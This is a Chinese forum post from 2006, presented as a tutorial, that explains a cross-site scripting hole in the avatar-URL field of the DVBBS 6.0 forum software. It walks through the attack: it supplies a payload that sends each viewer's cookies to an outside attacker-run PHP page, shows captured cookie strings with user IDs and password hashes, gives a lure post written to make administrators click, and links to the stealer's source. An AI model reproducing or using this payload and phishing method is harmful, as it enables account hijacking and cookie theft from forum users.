- 主题
- 0
- 积分
- 0
- 贝壳
- 0 个
- 注册时间
- 2006-10-14
- 最后登录
- 2006-10-20
|
[教程]动网论坛6.0存在跨战脚本漏洞
动网论坛(动网先锋论坛) 是一款由ASPSKY.NET开发和维护的源代码开?..最高版本为DVBBS VER 6.0.0 SP3。
◇此漏洞所涉及版本::
目前所有版本
◇描述:
由于没有对自定义头像的地址进行过滤,导致远程攻击者可以在自定义头像的地址中插入一段特殊代码。使恶意用户能够取得浏览网页用户的cookie信息。
◇具体分析与利用:
1. 分析:
关键的问题就出在MYMODIFY.ASP中,看看MYMODIFY.ASP的源代码,没有对自定义头像的地址进行滤。
javascript, jscript:, js:, about; value, document., onmouse,onexit都应该做严格过滤。这可能是开发者的因为疏忽造成的。
2.利用
目的:取得用户的cookie信息
首先我们要有一个空间,可以是支持ASP或者PHP的。
以下是获取cookie的php源代码:
如果得到cookie,则在空间中生成mood.txt,为了不引起怀疑,将自动把网页转换到http://mood.18.to
把它上传到支持php的空间上。比如这里我把它传到
http://yanren.com/mood.php
然后注册一个用户(强烈建议大家注册英文用户,如baobaoguai)
我们在“关于自定义头像”中插入如下代码:
java script:window.open('http://yanren.com/mood.php?'+documents.cookie)
然后提交,现在这个的头像已经成了一段偷cookie的特殊代码。现在回到首页,看看在线成员列表,点我们刚才注册的用户,看,它弹出了两个窗口,一个是关于mood这个用户的资料,另一个则是http://mood.18.to
aspsky=usercookies=1&userid=6621&tempid=&userhidden=2&password=965eb72c92a549dd&userclass=%D0%C2%CA%D6%C9%CF%C2%B7&username=%B9%D4%B1%A6%B1%A6111;%20ASPSESSIONIDCACARBQD=KFHGEADBKLHJGLDDBFEGCJCH;%20Longker+Union=lao=1;%20iscookies=0;%20BoardList=BoardID=Show;%20upNum=0;%20aspsky=userid=6621&usercookies=1&userhidden=&password=965eb72c92a549dd&tempid=&userclass=%D0%C2%CA%D6%C9%CF%C2%B7&username=%B9%D4%B1%A6%B1%A6111
哇哇,所有的cookie全都得到了。只不过经过了加密。
想得到别人的cookie,容易,我们把关于baobaoguai的资料地址复制一下。到论坛发个帖,比如标题是“管理员大人和各位用户快来看,我发现了好东西”,一般人都会点这个联接,而且URL是那个网站的,不会引起别人的怀疑。当他用的鼠标轻轻的点一下这个URL时,我们就窃取了他的cookie,并把他带到了我的主页,这叫玩黑广告两不误~~哈哈
http://yanren.com/mood.rar
php写的原代码文件 |
|